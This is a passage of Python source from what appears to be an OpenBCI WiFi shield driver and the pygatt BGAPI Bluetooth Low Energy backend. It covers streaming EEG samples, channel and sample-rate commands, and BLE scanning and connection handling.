Start handling streaming data from the board. Call a provided callback
for every single sample that is processed
Args:
callback: A callback function -- or a list of functions -- that will receive a single argument of the
OpenBCISample object captured.
"""
self.timer_end = timeit.default_timer()
print('latency time : %.4f sec '%(self.timer_end-self.timer_start))
# Enclose callback function in a list if it comes alone
if not isinstance(callback, list):
self.local_wifi_server.set_callback(callback)#calback function is print data in main()
else:
self.local_wifi_server.set_callback(callback[0])
if not self.streaming:
self.init_streaming()
# while self.streaming:
# # should the board get disconnected and we could not wait for notification anymore, a reco should be attempted through timeout mechanism
# try:
# # at most we will get one sample per packet
# self.waitForNotifications(1. / self.getSampleRate())
# except Exception as e:
# print("Something went wrong while waiting for a new sample: " + str(e))
# # retrieve current samples on the stack
# samples = self.delegate.getSamples()
# self.packets_dropped = self.delegate.getMaxPacketsDropped()
# if samples:
# self.time_last_packet = timeit.default_timer()
# for call in callback:
# for sample in samples:
# call(sample)
#
# if (lapse > 0 and timeit.default_timer() - start_time > lapse):
# self.stop();
# if self.log:
# self.log_packet_count = self.log_packet_count + 1;
#
# # Checking connection -- timeout and packets dropped
# self.check_connection()
def test_signal(self, signal):
""" Enable / disable test signal """
if signal == 0:
self.warn("Disabling synthetic square wave")
try:
self.wifi_write(']')
except Exception as e:
print("Something went wrong while setting signal: " + str(e))
elif signal == 1:
self.warn("Enabling synthetic square wave")
try:
self.wifi_write('[')
except Exception as e:
print("Something went wrong while setting signal: " + str(e))
else:
self.warn("%s is not a known test signal. Valid signal is 0-1" % signal)
def set_channel(self, channel, toggle_position):
""" Enable / disable channels """
try:
if channel > self.num_channels:
raise ValueError('Cannot set non-existant channel')
# Commands to set toggle to on position
if toggle_position == 1:
if channel is 1:
self.wifi_write('!')
if channel is 2:
self.wifi_write('@')
if channel is 3:
self.wifi_write('#')
if channel is 4:
self.wifi_write('$')
if channel is 5:
self.wifi_write('%')
if channel is 6:
self.wifi_write('^')
if channel is 7:
self.wifi_write('&')
if channel is 8:
self.wifi_write('*')
if channel is 9:
self.wifi_write('Q')
if channel is 10:
self.wifi_write('W')
if channel is 11:
self.wifi_write('E')
if channel is 12:
self.wifi_write('R')
if channel is 13:
self.wifi_write('T')
if channel is 14:
self.wifi_write('Y')
if channel is 15:
self.wifi_write('U')
if channel is 16:
self.wifi_write('I')
# Commands to set toggle to off position
elif toggle_position == 0:
if channel is 1:
self.wifi_write('1')
if channel is 2:
self.wifi_write('2')
if channel is 3:
self.wifi_write('3')
if channel is 4:
self.wifi_write('4')
if channel is 5:
self.wifi_write('5')
if channel is 6:
self.wifi_write('6')
if channel is 7:
self.wifi_write('7')
if channel is 8:
self.wifi_write('8')
if channel is 9:
self.wifi_write('q')
if channel is 10:
self.wifi_write('w')
if channel is 11:
self.wifi_write('e')
if channel is 12:
self.wifi_write('r')
if channel is 13:
self.wifi_write('t')
if channel is 14:
self.wifi_write('y')
if channel is 15:
self.wifi_write('u')
if channel is 16:
self.wifi_write('i')
except Exception as e:
print("Something went wrong while setting channels: " + str(e))
# See Cyton SDK for options
def set_channel_settings(self, channel, enabled=True, gain=24, input_type=0, include_bias=True, use_srb2=True, use_srb1=True):
try:
if channel > self.num_channels:
raise ValueError('Cannot set non-existant channel')
if self.board_type == k.BOARD_GANGLION:
raise ValueError('Cannot use with Ganglion')
ch_array = list("12345678QWERTYUI")
#defaults
command = list("x1060110X")
# Set channel
command[1] = ch_array[channel-1]
# Set power down if needed (default channel enabled)
if not enabled:
command[2] = '1'
# Set gain (default 24)
if gain == 1:
command[3] = '0'
if gain == 2:
command[3] = '1'
if gain == 4:
command[3] = '2'
if gain == 6:
command[3] = '3'
if gain == 8:
command[3] = '4'
if gain == 12:
command[3] = '5'
#TODO: Implement input type (default normal)
# Set bias inclusion (default include)
if not include_bias:
command[5] = '0'
# Set srb2 use (default use)
if not use_srb2:
command[6] = '0'
# Set srb1 use (default don't use)
if use_srb1:
command[6] = '1'
command_send = ''.join(command)
self.wifi_write(command_send)
#Make sure to update gain in wifi
self.gains[channel-1] = gain
self.local_wifi_server.set_gains(gains=self.gains)
self.local_wifi_server.set_parser(ParseRaw(gains=self.gains, board_type=self.board_type))
except ValueError as e:
print("Something went wrong while setting channel settings: " + str(e))
def set_sample_rate(self, sample_rate):
""" Change sample rate """
try:
if self.board_type == k.BOARD_CYTON or self.board_type == k.BOARD_DAISY:
if sample_rate == 250:
self.wifi_write('~6')
elif sample_rate == 500:
self.wifi_write('~5')
elif sample_rate == 1000:
self.wifi_write('~4')
elif sample_rate == 2000:
self.wifi_write('~3')
elif sample_rate == 4000:
self.wifi_write('~2')
elif sample_rate == 8000:
self.wifi_write('~1')
elif sample_rate == 16000:
self.wifi_write('~0')
else:
print("Sample rate not supported: " + str(sample_rate))
elif self.board_type == k.BOARD_GANGLION:
if sample_rate == 200:
self.wifi_write('~7')
elif sample_rate == 400:
self.wifi_write('~6')
elif sample_rate == 800:
self.wifi_write('~5')
elif sample_rate == 1600:
self.wifi_write('~4')
elif sample_rate == 3200:
self.wifi_write('~3')
elif sample_rate == 6400:
self.wifi_write('~2')
elif sample_rate == 12800:
self.wifi_write('~1')
elif sample_rate == 25600:
self.wifi_write('~0')
else:
print("Sample rate not supported: " + str(sample_rate))
else:
print("Board type not supported for setting sample rate")
except Exception as e:
print("Something went wrong while setting sample rate: " + str(e))
def set_accelerometer(self, toggle_position):
""" Enable / disable accelerometer """
try:
if self.board_type == k.BOARD_GANGLION:
# Commands to set toggle to on position
if toggle_position == 1:
self.wifi_write('n')
# Commands to set toggle to off position
elif toggle_position == 0:
self.wifi_write('N')
else:
print("Board type not supported for setting accelerometer")
except Exception as e:
print("Something went wrong while setting accelerometer: " + str(e))
"""
Clean Up (atexit)
"""
def stop(self):
print("Stop streaming...")
self.streaming = False
# connection might be already down here
try:
if self.impedance:
print("Stopping with impedance testing")
self.wifi_write('Z')
else:
self.wifi_write('s')
except Exception as e:
print("Something went wrong while asking the board to stop streaming: " + str(e))
if self.log:
logging.warning('sent <s>: stopped streaming')
print('save recording...')
np.save('recording', self.local_wifi_server.handler.records)
def disconnect(self):
if self.streaming:
self.stop()
# should not try to read/write anything after that, will crash
"""
SETTINGS AND HELPERS
"""
def warn(self, text):
if self.log:
# log how many packets where sent succesfully in between warnings
if self.log_packet_count:
logging.info('Data packets received:' + str(self.log_packet_count))
self.log_packet_count = 0
logging.warning(text)
print("Warning: %s" % text)
def check_connection(self):
""" Check connection quality in term of lag and number of packets drop. Reinit connection if necessary. FIXME: parameters given to the board will be lost."""
# stop checking when we're no longer streaming
if not self.streaming:
return
# check number of dropped packets and duration without new packets, deco/reco if too large
if self.packets_dropped > self.max_packets_to_skip:
self.warn("Too many packets dropped, attempt to reconnect")
self.reconnect()
elif self.timeout > 0 and timeit.default_timer() - self.time_last_packet > self.timeout:
self.warn("Too long since got new data, attempt to reconnect")
# if error, attempt to reconect
self.reconnect()
def reconnect(self):
""" In case of poor connection, will shut down and relaunch everything. FIXME: parameters given to the board will be lost."""
self.warn('Reconnecting')
self.stop()
self.disconnect()
self.connect()
self.init_streaming()
class WiFiShieldHandler(asyncore.dispatcher_with_send):
def __init__(self, sock, callback=None, high_speed=True,
parser=None, daisy=False):
asyncore.dispatcher_with_send.__init__(self, sock)
self.callback = callback
self.daisy = daisy
self.high_speed = high_speed
self.last_odd_sample = OpenBCISample()
self.parser = parser if parser is not None else ParseRaw(gains=[24, 24, 24, 24, 24, 24, 24, 24])
self.records = np.zeros(16)
def handle_read(self):
# recv is from asyncore recv(buffer_size)
#print('i am in handle_read')
data = self.recv(3000) # 3000 is the max data the WiFi shield is allowed to send over TCP
if len(data) > 2:
if self.high_speed:
packets = int(len(data)/33)
raw_data_packets = []
for i in range(packets):
raw_data_packets.append(bytearray(data[i * k.RAW_PACKET_SIZE: i * k.RAW_PACKET_SIZE + k.RAW_PACKET_SIZE]))
# where is transform_raw_data_packets_to_sample function?
samples = self.parser.transform_raw_data_packets_to_sample(raw_data_packets=raw_data_packets)
for sample in samples:
# if a daisy module is attached, wait to concatenate two samples (main board + daisy)
# before passing it to callback
print(sample.sample_number, np.array(sample.channel_data))
if self.daisy:
# odd sample: daisy sample, save for later
if ~sample.sample_number % 2:
self.last_odd_sample = sample
# even sample: concatenate and send if last sample was the first part, otherwise drop the packet
elif sample.sample_number - 1 == self.last_odd_sample.sample_number:
# the aux data will be the average between the two samples, as the channel
# samples themselves have been averaged by the board
daisy_sample = self.parser.make_daisy_sample_object_wifi(self.last_odd_sample, sample)
print('daisy', daisy_sample.sample_number,np.array(daisy_sample.channel_data))
#self.records = np.vstack((self.records,np.array(daisy_sample.channel_data)))
if self.callback is not None:
self.callback(daisy_sample)####
else:
if self.callback is not None:
self.callback(sample)
else:
try:
possible_chunks = data.split('\r\n')
if len(possible_chunks) > 1:
possible_chunks = possible_chunks[:-1]
for possible_chunk in possible_chunks:
if len(possible_chunk) > 2:
chunk_dict = json.loads(possible_chunk)
if 'chunk' in chunk_dict:
for sample in chunk_dict['chunk']:
if self.callback is not None:
self.callback(sample)
else:
print("not a sample packet")
except ValueError as e:
print("failed to parse: %s" % data)
print(e)
except BaseException as e:
print(e)
class WiFiShieldServer(asyncore.dispatcher):#server
def __init__(self, host, port, callback=None, gains=None, high_speed=True, daisy=False):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.daisy = daisy
self.listen(5)
self.callback = None
self.handler = None
self.parser = ParseRaw(gains=gains)
self.high_speed = high_speed
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock, addr = pair
print('Incoming connection from %s' % repr(addr))
self.handler = WiFiShieldHandler(sock, self.callback, high_speed=self.high_speed,
parser=self.parser, daisy=self.daisy)
def set_callback(self, callback):
self.callback = callback
if self.handler is not None:
self.handler.callback = callback #print Data in main()
def set_daisy(self, daisy):
self.daisy = daisy
if self.handler is not None:
self.handler.daisy = daisy
def set_gains(self, gains):
self.parser.set_ads1299_scale_factors(gains)
def set_parser(self, parser):
self.parser = parser
if self.handler is not None:
self.handler.parser = parser
|
bgapi.py
|
from __future__ import print_function
# for Python 2/3 compatibility
try:
import queue
except ImportError:
import Queue as queue
import logging
import serial
import time
import threading
from binascii import hexlify, unhexlify
from uuid import UUID
from enum import Enum
from collections import defaultdict
from pygatt.exceptions import NotConnectedError
from pygatt.backends import BLEBackend, Characteristic, BLEAddressType
from pygatt.util import uuid16_to_uuid
from . import bglib, constants
from .exceptions import BGAPIError, ExpectedResponseTimeout
from .device import BGAPIBLEDevice
from .bglib import EventPacketType, ResponsePacketType
from .packets import BGAPICommandPacketBuilder as CommandBuilder
from .error_codes import get_return_message
from .util import find_usb_serial_devices
try:
import termios
except ImportError:
# Running in Windows (not Linux/OS X/Cygwin)
serial_exception = RuntimeError
else:
serial_exception = termios.error
log = logging.getLogger(__name__)
BLED112_VENDOR_ID = 0x2458
BLED112_PRODUCT_ID = 0x0001
MAX_CONNECTION_ATTEMPTS = 10
UUIDType = Enum('UUIDType', ['custom', 'service', 'attribute',
'descriptor', 'characteristic',
'nonstandard'])
def _timed_out(start_time, timeout):
return time.time() - start_time > timeout
def bgapi_address_to_hex(address):
address = hexlify(bytearray(
list(reversed(address)))).upper().decode('ascii')
return ':'.join(''.join(pair) for pair in zip(*[iter(address)] * 2))
class AdvertisingAndScanInfo(object):
"""
Holds the advertising and scan response packet data from a device at a given
address.
"""
def __init__(self):
self.name = ""
self.address = ""
self.rssi = None
self.packet_data = {
# scan_response_packet_type[xxx]: data_dictionary,
}
class BGAPIBackend(BLEBackend):
"""
A BLE backend for a BGAPI compatible USB adapter.
"""
def __init__(self, serial_port=None, receive_queue_timeout=0.1):
"""
Initialize the backend, but don't start the USB connection yet. Must
call .start().
serial_port -- The name of the serial port for the BGAPI-compatible
USB interface. If not provided, will attempt to auto-detect.
"""
self._lib = bglib.BGLib()
self._serial_port = serial_port
self._receive_queue_timeout = receive_queue_timeout
self._ser = None
self._receiver = None
self._running = None
self._lock = threading.Lock()
# buffer for packets received
self._receiver_queue = queue.Queue()
# State
self._num_bonds = 0 # number of bonds stored on the adapter
self._stored_bonds = [] # bond handles stored on the adapter
self._devices_discovered = {
# 'address': AdvertisingAndScanInfo,
# Note: address formatted like "01:23:45:67:89:AB"
}
self._characteristics = defaultdict(dict)
self._connections = {}
self._current_characteristic = None # used in char/descriptor discovery
self._packet_handlers = {
ResponsePacketType.sm_get_bonds: self._ble_rsp_sm_get_bonds,
EventPacketType.attclient_attribute_value: (
self._ble_evt_attclient_attribute_value),
EventPacketType.attclient_find_information_found: (
self._ble_evt_attclient_find_information_found),
EventPacketType.connection_status: self._ble_evt_connection_status,
EventPacketType.connection_disconnected: (
self._ble_evt_connection_disconnected),
EventPacketType.gap_scan_response: self._ble_evt_gap_scan_response,
EventPacketType.sm_bond_status: self._ble_evt_sm_bond_status,
}
log.debug("Initialized new BGAPI backend")
def _detect_device_port(self):
log.debug("Auto-detecting serial port for BLED112")
detected_devices = find_usb_serial_devices(
vendor_id=BLED112_VENDOR_ID,
product_id=BLED112_PRODUCT_ID)
if len(detected_devices) == 0:
raise BGAPIError("Unable to auto-detect BLED112 serial port")
log.info("Found BLED112 on serial port %s",
detected_devices[0].port_name)
return detected_devices[0].port_name
def _open_serial_port(self,
max_connection_attempts=MAX_CONNECTION_ATTEMPTS):
"""
Open a connection to the named serial port, or auto-detect the first
port matching the BLED device. This will wait until data can actually be
read from the connection, so it will not return until the device is
fully booted.
max_connection_attempts -- Max number of times to retry
detecting and connecting to a device.
Raises a NotConnectedError if the device cannot connect after 10
attempts, with a short pause in between each attempt.
"""
for attempt in range(max_connection_attempts):
log.debug("Opening connection to serial port (attempt %d)",
attempt + 1)
try:
serial_port = self._serial_port or self._detect_device_port()
self._ser = None
self._ser = serial.Serial(serial_port, baudrate=115200,
timeout=0.25)
# Wait until we can actually read from the device
self._ser.read()
break
except (BGAPIError, serial.serialutil.SerialException,
serial_exception):
log.debug("Failed to open serial port", exc_info=True)
if self._ser:
self._ser.close()
elif attempt == 0:
raise NotConnectedError(
"No BGAPI compatible device detected")
self._ser = None
time.sleep(0.25)
else:
raise NotConnectedError("Unable to reconnect with USB "
"device after rebooting")
def _initialize_device(self, reset=True):
""" Prepare an opened BGAPI device for use """
self._receiver = threading.Thread(target=self._receive)
self._receiver.daemon = True
self._running = threading.Event()
self._running.set()
self._receiver.start()
# Stop any ongoing procedure
log.debug("Stopping any outstanding GAP procedure")
self.send_command(CommandBuilder.gap_end_procedure())
try:
self.expect(ResponsePacketType.gap_end_procedure)
except BGAPIError:
# Ignore any errors if there was no GAP procedure running
pass
self.disable_advertising(skip_reply=not reset)
self.set_bondable(False)
# Check to see if there are any existing connections and add them
# Request the number of currently connected modules from the adapter
self.send_command(CommandBuilder.system_get_connections())
_, connections = self.expect(ResponsePacketType.system_get_connections)
# Adapter should also generate one EventPacketType.connection_status
# for each supported connection
for _ in range(connections['maxconn']):
_, conn = self.expect(EventPacketType.connection_status)
# If any connection flags are set, this is an active connection
if conn['flags'] > 0:
# Create new ble object to insert into the adapter
ble = BGAPIBLEDevice(bgapi_address_to_hex(conn['address']),
conn['connection_handle'],
self)
# pylint: disable=protected-access
self._connections[conn['connection_handle']] = ble
def start(self, reset=True, tries=5):
"""
Connect to the USB adapter, reset it's state and start a backgroud
receiver thread.
"""
if self._running and self._running.is_set():
self.stop()
# Fail immediately if no device is attached, don't retry waiting for one
# to be plugged in.
self._open_serial_port(max_connection_attempts=1)
if reset:
log.debug("Resetting and reconnecting to device for a clean environment")
# Blow everything away and start anew.
# Only way to be sure is to burn it down and start again.
# (Aka reset remote state machine)
# Note: Could make this a conditional based on parameter if this
# happens to be too slow on some systems.
# The zero param just means we want to do a normal restart instead of
# starting a firmware update restart.
self.send_command(CommandBuilder.system_reset(0))
self._ser.flush()
self._ser.close()
# Re-open the port. On Windows, it has been observed that the
# port is no immediately available - so retry for up to 2 seconds.
start = time.clock()
retry_t = 0.2
while True:
try:
self._open_serial_port()
except:
if time.clock() - start > 2:
raise
else:
log.debug('Port not ready, retry in %.2f seconds...' % retry_t)
time.sleep(retry_t)
else:
break
if tries is None or not tries:
# Try at least once to open the port
tries = 1
# Sometimes when opening the port without a reset, it'll fail to respond
# So let's try to repeat the initialization process a few times
while tries:
tries -= 1
try:
self._initialize_device(reset)
return
except ExpectedResponseTimeout:
if tries:
log.info("BLED unresponsive, re-opening")
self.stop()
self._open_serial_port(max_connection_attempts=1)
continue
# If we got here, we failed to open the port
raise NotConnectedError()
def stop(self):
for device in self._connections.values():
try:
device.disconnect()
except NotConnectedError:
pass
if self._running:
if self._running.is_set():
log.debug('Stopping')
self._running.clear()
if self._receiver:
self._receiver.join()
self._receiver = None
if self._ser:
self._ser.close()
self._ser = None
def set_bondable(self, bondable):
self.send_command(
CommandBuilder.sm_set_bondable_mode(
constants.bondable['yes' if bondable else 'no']))
self.expect(ResponsePacketType.sm_set_bondable_mode)
def disable_advertising(self, skip_reply=False):
log.debug("Disabling advertising")
self.send_command(
CommandBuilder.gap_set_mode(
constants.gap_discoverable_mode['non_discoverable'],
constants.gap_connectable_mode['non_connectable']))
if not skip_reply:
self.expect(ResponsePacketType.gap_set_mode)
def send_command(self, *args, **kwargs):
with self._lock:
if self._ser is None:
log.warn("Unexpectedly not connected to USB device")
raise NotConnectedError()
return self._lib.send_command(self._ser, *args, **kwargs)
def clear_bond(self, address=None):
"""
Delete the bonds stored on the adapter.
address - the address of the device to unbond. If not provided, will
erase all bonds.
Note: this does not delete the corresponding bond stored on the remote
device.
"""
# Find bonds
log.debug("Fetching existing bonds for devices")
self._stored_bonds = []
self.send_command(CommandBuilder.sm_get_bonds())
try:
self.expect(ResponsePacketType.sm_get_bonds)
except NotConnectedError:
pass
if self._num_bonds == 0:
return
while len(self._stored_bonds) < self._num_bonds:
self.expect(EventPacketType.sm_bond_status)
for b in reversed(self._stored_bonds):
log.debug("Deleting bond %s", b)
self.send_command(CommandBuilder.sm_delete_bonding(b))
self.expect(ResponsePacketType.sm_delete_bonding)
def scan(self, timeout=10, scan_interval=75, scan_window=50, active=True,
discover_mode=constants.gap_discover_mode['observation'],
**kwargs):
"""
Perform a scan to discover BLE devices.
timeout -- the number of seconds this scan should last.
scan_interval -- the number of miliseconds until scanning is restarted.
scan_window -- the number of miliseconds the scanner will listen on one
frequency for advertisement packets.
active -- True --> ask sender for scan response data. False --> don't.
discover_mode -- one of the gap_discover_mode constants.
"""
parameters = 1 if active else 0
# NOTE: the documentation seems to say that the times are in units of
# 625us but the ranges it gives correspond to units of 1ms....
self.send_command(
CommandBuilder.gap_set_scan_parameters(
scan_interval, scan_window, parameters
))
self.expect(ResponsePacketType.gap_set_scan_parameters)
log.debug("Starting an %s scan", "active" if active else "passive")
self.send_command(CommandBuilder.gap_discover(discover_mode))
self.expect(ResponsePacketType.gap_discover)
log.debug("Pausing for %ds to allow scan to complete", timeout)
time.sleep(timeout)
log.debug("Stopping scan")
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
devices = []
for address, info in self._devices_discovered.items():
devices.append({
'address': address,
'name': info.name,
'rssi': info.rssi,
'packet_data': info.packet_data
})
log.debug("Discovered %d devices: %s", len(devices), devices)
self._devices_discovered = {}
return devices
def _end_procedure(self):
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
def connect(self, address, timeout=5,
address_type=BLEAddressType.public,
interval_min=60, interval_max=76, supervision_timeout=100,
latency=0):
"""
Connnect directly to a device given the ble address then discovers and
stores the characteristic and characteristic descriptor handles.
Requires that the adapter is not connected to a device already.
address -- a bytearray containing the device mac address.
timeout -- number of seconds to wait before returning if not connected.
address_type -- one of BLEAddressType's values, either public or random.
Raises BGAPIError or NotConnectedError on failure.
"""
address_bytes = bytearray(unhexlify(address.replace(":", "")))
for device in self._connections.values():
if device._address == bgapi_address_to_hex(address_bytes):
return device
log.debug("Connecting to device at address %s (timeout %ds)",
address, timeout)
self.set_bondable(False)
if address_type == BLEAddressType.public:
addr_type = constants.ble_address_type['gap_address_type_public']
else:
addr_type = constants.ble_address_type['gap_address_type_random']
self.send_command(
CommandBuilder.gap_connect_direct(
address_bytes, addr_type, interval_min, interval_max,
supervision_timeout, latency))
try:
self.expect(ResponsePacketType.gap_connect_direct)
_, packet = self.expect(EventPacketType.connection_status,
timeout=timeout)
# TODO what do we do if the status isn't 'connected'? Retry?
# Raise an exception? Should also check the address matches the
# expected TODO i'm finding that when reconnecting to the same
# MAC, we geta conneciotn status of "disconnected" but that is
# picked up here as "connected", then we don't get anything
# else.
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['connected']):
device = BGAPIBLEDevice(
bgapi_address_to_hex(packet['address']),
packet['connection_handle'],
self)
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['encrypted']):
device.encrypted = True
self._connections[packet['connection_handle']] = device
log.info("Connected to %s", address)
return device
except ExpectedResponseTimeout:
# If the connection doesn't occur because the device isn't there
# then you should manually stop the command.
#
# If we never get the connection status it is likely that it
# didn't occur because the device isn't there. If that is true
# then we have to manually stop the command.
self._end_procedure()
exc = NotConnectedError()
exc.__cause__ = None
raise exc
def discover_characteristics(self, connection_handle):
att_handle_start = 0x0001 # first valid handle
att_handle_end = 0xFFFF # last valid handle
log.debug("Fetching characteristics for connection %d",
connection_handle)
self.send_command(
CommandBuilder.attclient_find_information(
connection_handle, att_handle_start, att_handle_end))
self.expect(ResponsePacketType.attclient_find_information)
self.expect(EventPacketType.attclient_procedure_completed,
timeout=10)
for char_uuid_str, char_obj in (
self._characteristics[connection_handle].items()):
log.debug("Characteristic 0x%s is handle 0x%x",
char_uuid_str, char_obj.handle)
for desc_uuid_str, desc_handle in (
char_obj.descriptors.items()):
log.debug("Characteristic descriptor 0x%s is handle 0x%x",
desc_uuid_str, desc_handle)
return self._characteristics[connection_handle]
@staticmethod
def _connection_status_flag(flags, flag_to_find):
"""
Is the given flag in the connection status flags?
flags -- the 'flags' parameter returned by ble_evt_connection_status.
flag_to_find -- the flag to look for in flags.
Returns true if flag_to_find is in flags. Returns false otherwise.
"""
return (flags & flag_to_find) == flag_to_find
@staticmethod
def _get_uuid_type(uuid):
"""
Checks if the UUID is a custom 128-bit UUID or a GATT characteristic
descriptor UUID.
uuid -- the UUID as a bytearray.
Return a UUIDType.
"""
if len(uuid) == 16: # 128-bit --> 16 byte
return UUIDType.custom
if uuid in constants.gatt_service_uuid.values():
return UUIDType.service
if uuid in constants.gatt_attribute_type_uuid.values():
return UUIDType.attribute
if uuid in constants.gatt_characteristic_descriptor_uuid.values():
return UUIDType.descriptor
if uuid in constants.gatt_characteristic_type_uuid.values():
return UUIDType.characteristic
log.warn("Unrecognized 4 byte UUID %s", hexlify(uuid))
return UUIDType.nonstandard
def _scan_rsp_data(self, data):
"""
Parse scan response data.
Note: the data will come in a format like the following:
[data_length, data_type, data..., data_length, data_type, data...]
data -- the args['data'] list from _ble_evt_scan_response.
Returns a name and a dictionary containing the parsed data in pairs of
field_name': value.
"""
# Result stored here
data_dict = {
# 'name': value,
}
bytes_left_in_field = 0
field_name = None
field_value = []
# Iterate over data bytes to put in field
dev_name = ""
for b in data:
if bytes_left_in_field == 0:
# New field
bytes_left_in_field = b
field_value = []
else:
field_value.append(b)
bytes_left_in_field -= 1
if bytes_left_in_field == 0:
# End of field
field_name = (
constants.scan_response_data_type[field_value[0]])
field_value = field_value[1:]
# Field type specific formats
if (field_name == 'complete_local_name' or
field_name == 'shortened_local_name'):
dev_name = bytearray(field_value).decode("utf-8")
data_dict[field_name] = dev_name
elif (field_name ==
'complete_list_128-bit_service_class_uuids'):
if len(field_value) % 16 == 0: # 16 bytes
data_dict[field_name] = []
for i in range(0, int(len(field_value) / 16)):
service_uuid = (
"0x%s" %
bgapi_address_to_hex(
field_value[i * 16:i * 16 + 16]))
data_dict[field_name].append(service_uuid)
else:
log.warning("Expected a service class UUID of 16\
bytes. Instead received %d bytes",
len(field_value))
else:
data_dict[field_name] = bytearray(field_value)
return dev_name, data_dict
def expect(self, expected, *args, **kargs):
return self.expect_any([expected], *args, **kargs)
def expect_any(self, expected_packet_choices, timeout=None,
assert_return_success=True):
"""
Process packets until a packet of one of the expected types is found.
expected_packet_choices -- a list of BGLib.PacketType.xxxxx. Upon
processing a packet of a type contained in
the list, this function will return.
timeout -- maximum time in seconds to process packets.
assert_return_success -- raise an exception if the return code from a
matched message is non-zero.
Raises an ExpectedResponseTimeout if one of the expected responses is
not receiving withint the time limit.
"""
timeout = timeout or 1
log.debug("Expecting a response of one of %s within %fs",
expected_packet_choices, timeout or 0)
start_time = None
if timeout is not None:
start_time = time.time()
while True:
packet = None
try:
packet = self._receiver_queue.get(
timeout=self._receive_queue_timeout)
except queue.Empty:
if timeout is not None:
if _timed_out(start_time, timeout):
exc = ExpectedResponseTimeout(
expected_packet_choices, timeout)
exc.__cause__ = None
raise exc
continue
if packet is None:
raise ExpectedResponseTimeout(expected_packet_choices, timeout)
packet_type, response = self._lib.decode_packet(packet)
return_code = response.get('result', 0)
log.debug("Received a %s packet: %s",
packet_type, get_return_message(return_code))
if packet_type in self._packet_handlers:
self._packet_handlers[packet_type](response)
if packet_type in expected_packet_choices:
return packet_type, response
def _receive(self):
"""
Read bytes from serial and enqueue the packets if the packet is not a.
Stops if the self._running event is not set.
"""
log.debug("Running receiver")
while self._running.is_set():
packet = self._lib.parse_byte(self._ser.read())
if packet is not None:
decoded = self._lib.decode_packet(packet)
if decoded is None:
continue
packet_type, args = decoded
if packet_type == EventPacketType.attclient_attribute_value and\
args['connection_handle'] in self._connections:
device = self._connections[args['connection_handle']]
device.receive_notification(args['atthandle'],
bytearray(args['value']))
self._receiver_queue.put(packet)
log.debug("Stopping receiver")
def _ble_evt_attclient_attribute_value(self, args):
"""
Handles the event for values of characteristics.
args -- dictionary containing the attribute handle ('atthandle'),
attribute type ('type'), and attribute value ('value')
"""
log.debug("attribute handle = %x", args['atthandle'])
log.debug("attribute type = %x", args['type'])
log.debug("attribute value = 0x%s", hexlify(bytearray(args['value'])))
def _ble_evt_attclient_find_information_found(self, args):
"""
Handles the event for characteritic discovery.
Adds the characteristic to the dictionary of characteristics or adds
the descriptor to the dictionary of descriptors in the current
characteristic. These events will be occur in an order similar to the
following:
1) primary service uuid
2) 0 or more descriptors
3) characteristic uuid
4) 0 or more descriptors
5) repeat steps 3-4
args -- dictionary containing the characteristic handle ('chrhandle'),
and characteristic UUID ('uuid')
"""
raw_uuid = bytearray(reversed(args['uuid']))
# Convert 4-byte UUID shorthand to a full, 16-byte UUID
uuid_type = self._get_uuid_type(raw_uuid)
if uuid_type != UUIDType.custom:
uuid = uuid16_to_uuid(int(
bgapi_address_to_hex(args['uuid']).replace(':', ''), 16))
else:
uuid = UUID(bytes=bytes(raw_uuid))
# TODO is there a way to get the characteristic from the packet instead
# of having to track the "current" characteristic?
if (uuid_type == UUIDType.descriptor and
self._current_characteristic is not None):
self._current_characteristic.add_descriptor(uuid, args['chrhandle'])
elif (uuid_type == UUIDType.custom or
uuid_type == UUIDType.nonstandard or
uuid_type == UUIDType.characteristic):
if uuid_type == UUIDType.custom:
log.debug("Found custom characteristic %s" % uuid)
elif uuid_type == UUIDType.characteristic:
log.debug("Found approved characteristic %s" % uuid)
elif uuid_type == UUIDType.nonstandard:
log.debug("Found nonstandard 4-byte characteristic %s" % uuid)
new_char = Characteristic(uuid, args['chrhandle'])
self._current_characteristic = new_char
self._characteristics[
args['connection_handle']][uuid] = new_char
def _ble_evt_connection_disconnected(self, args):
"""
Handles the event for the termination of a connection.
"""
self._connections.pop(args['connection_handle'], None)
def _ble_evt_connection_status(self, args):
"""
Handles the event for reporting connection status.
args -- dictionary containing the connection status flags ('flags'),
device address ('address'), device address type ('address_type'),
connection interval ('conn_interval'), connection timeout
(timeout'), device latency ('latency'), device bond handle
('bonding')
"""
connection_handle = args['connection_handle']
if not self._connection_status_flag(
args['flags'],
constants.connection_status_flag['connected']):
# Disconnected
self._connections.pop(connection_handle, None)
log.debug("Connection status: handle=0x%x, flags=%s, address=0x%s, "
"connection interval=%fms, timeout=%d, "
"latency=%d intervals, bonding=0x%x",
connection_handle,
args['address'],
hexlify(bytearray(args['address'])),
args['conn_interval'] * 1.25,
args['timeout'] * 10,
args['latency'],
args['bonding'])
def _ble_evt_gap_scan_response(self, args):
"""
Handles the event for reporting the contents of an advertising or scan
response packet.
This event will occur during device discovery but not direct connection.
args -- dictionary containing the RSSI value ('rssi'), packet type
('packet_type'), address of packet sender ('sender'), address
type ('address_type'), existing bond handle ('bond'), and
scan resonse data list ('data')
"""
# Parse packet
packet_type = constants.scan_response_packet_type[args['packet_type']]
address = bgapi_address_to_hex(args['sender'])
name, data_dict = self._scan_rsp_data(args['data'])
# Store device information
if address not in self._devices_discovered:
self._devices_discovered[address] = AdvertisingAndScanInfo()
dev = self._devices_discovered[address]
if dev.name == "":
dev.name = name
if dev.address == "":
dev.address = address
if (packet_type not in dev.packet_data or
len(dev.packet_data[packet_type]) < len(data_dict)):
dev.packet_data[packet_type] = data_dict
dev.rssi = args['rssi']
log.debug("Received a scan response from %s with rssi=%d dBM "
"and data=%s", address, args['rssi'], data_dict)
def _ble_evt_sm_bond_status(self, args):
"""
Handles the event for reporting a stored bond.
Adds the stored bond to the list of bond handles.
args -- dictionary containing the bond handle ('bond'), encryption key
size used in the long-term key ('keysize'), was man in the
middle used ('mitm'), keys stored for bonding ('keys')
"""
# Add to list of stored bonds found or set flag
self._stored_bonds.append(args['bond'])
def _ble_rsp_sm_delete_bonding(self, args):
"""
Handles the response for the deletion of a stored bond.
args -- dictionary containing the return code ('result')
"""
result = args['result']
